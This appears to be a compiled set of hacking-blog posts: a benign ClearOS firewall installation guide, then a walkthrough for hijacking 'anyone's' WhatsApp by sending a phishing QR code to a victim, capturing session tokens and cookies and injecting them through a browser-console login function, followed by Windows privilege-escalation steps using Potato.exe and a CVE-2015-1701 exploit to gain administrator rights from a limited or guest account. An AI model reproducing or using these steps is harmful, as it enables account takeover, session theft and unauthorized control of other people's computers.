Setup Firewall Pentest Lab using Clear OS

Clear OS is basically a Linux based server operating system for small business which comes with server, networking and gateway related functions. Clear OS is available in a Home, Business and free Community Edition. It is normally managed from a web-based interface but it can also be completely operated from a command line. But mostly ClearOS is used as firewall.

Let’s see how to install Clear OS.

First, make bootable disk or pen drive from Yumi or Rufus.

Then restart your computer and select:  Install ClearOS

After selecting press Enter

Select the language in which you are comfortable.

After that Installation summary interface will appear

Select Date and Time from localization section.

Then select installation source and click on done.

After that select Network and host name. Turn on and configure your network setting.

Now after setting everything, clicks on Begin Installation and then installation will start. You have to set root password also.

After finish installing system will reboot. And then clear OS will provide you with a link that contains IP address.  Open that link in a browser.

When you will open that link in your browser it will ask you to login into your account, use username as root and password what you set at the time of installation and login.

After login you have to configure clearOS

Configure network interfaces. Change type to static and set ip address what you set IP address and then click next.

Select your Edition and click next.

Fill system registration form and click next.

Now you have to set hostname for your NIC (Network Interface Card). Set hostname for internal and external NIC and click next.

After that from marketplace you have select and install apps which is required for monitoring, administration. After finishing your configuration a simple dashboard will appear, from here you can utilize clearOS as per your need.

Author: AkshayBhardwaj is a passionate Hacker, Information Security Researcher | Sketch Artist |Technical writer. You can follow him on LinkedIn and Facebook

Hack anyone’s Whatsapp through QR code (Working)

Recently Whatsapp has released a new important update for their Whatsapp users that is End-to-End Encryption, means it’s impossible to decrypt this type of encryption even Whatsapp can’t decrypt it. This is really good news for every Whatsapp users.

But remember “Security is just an illusion” I’m saying this because there is a way by which whatsapp can be hacked and that is by phishing method.

So let’s start first download Selenium standalone server jar file from here

Then open terminal change directory where you downloaded that Selenium server file in my case I downloaded it on my Desktop.

Cd /root/Desktop/

Then type:

./selenium-server-standalone-2.53.0.jar

Now it will start the selenium server. Then open a new terminal and type:

git clone https://github.com/Mawalu/whatsapp-phishing.git

It will clone repository of whatsapp-phishingfromGithub. After that type:

cd whatsapp-phishing

Thentype:

npm install

It will install all required things like node.js and socket.io which is required to run website and selenium server. If you encounter any “missing” error then you have to install it manually, toinstall missing part manually type:

npm install node.js

npm install socket.io

npm install wd

After installingtype in terminal:

node index.js

It willstart http and a socket.io server

Now open your MozillaFirefox and type in address bar:

http://localhost:8080

When you press enter, it will open a new browser and connect to the web.whatsapp.com and will generate a QR code in the browser. The generated phishing QR code will continuously sync with web.whatsapp.com QR code.

Now send this QR code to a victim through social engineering method, when victim scan that QR code through their mobile Whatsapp scanner then Whatsapp will authenticate the browser which is controlled by selenium server and then fetch tokens and document.cookie from victims Whatsapp.

Now you have to copy tokens and document.cookie, to see stored tokens and document.cookiethere are two ways

  1. First way is go to:

/root/whatsapp-phishing/

In whatsapp-phishing directory a file namedsecrets will be created automatically when victim scan that phishing QR code and that file contains token ID and document.cookie

Second way is go the terminal where js is running already, there you will find that some codes are fetched that is our goddam gold means victim token ID that’s what we require to get access to his/her Whatsapp account.

In both the ways you will find there are multiple token IDs fetched but we only want latest fetched token ID and document.cookie. So to do so copy lastfetched token  which startswith {“s”: and end with   “c”:””} . See the picture for reference.

Then open Firefoxbrowser as incognito mode and then open link https://web.whatsapp.com/

After that open developers mode in browser and go to console and type

var t = PASTE_HERE _VICTIM_TOKEN-ID

Then type following code:

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}

And at last type:

>login (t)

Now reload the browser window and wait. Bannggg!!automatically after few seconds you will be logged in as the person who scanned the QR code (phishing QR code that we have created.)

Enjoy. Stay tuned for more tutorials like this.

AUTHOR: AkshayBhardwaj is an Information Security Enthusiast and Researcher | Sketch Artist |Technical writer.

facebook

Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato

First check your IP Address of your local PC using ipconfig command

Now open command prompt, type net localgroup administrators command to check who all users are associated with administrator.

In my case I’m login with RAAZ user which is not a part of administrator

Now download Potato.exe from here and go to the Potato folder from command prompt and type

Potato.exe –ip 192.168.1.9 –disable_exhaust true –cmd “C:\\windows\\System32\\cmd.exe /K net localgroup administrators RAAZ /add”

Now it will open a firewall prompt, click on Allow access

Now again type net localgroup administrators, here you can see my user RAAZ is also a member of administrator.

Hack Windows 7 Password from Guest Account using 2015-1701 Exploit (Easy Way)

From Wikipedia

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Now here type net user command to change the admin password but it will show you the error “Access is denied”

Download CVE 2015-1701 from here and unzip in your Pc. Then go to the compiled folder in CVE Master. Here you will find 2 exe files for 32-bit user and 64-bit user(in my case I’m using 64-bit user).

Now run Taihou64.exe, it will open a command prompt with admin priveleges. Now you can change the password using net user command. Example is given below:

Syntax:

net user (username) *   then press enter

Note: This trick works only on Windows7(all versions) not available for Windows8 and Windows10 yet.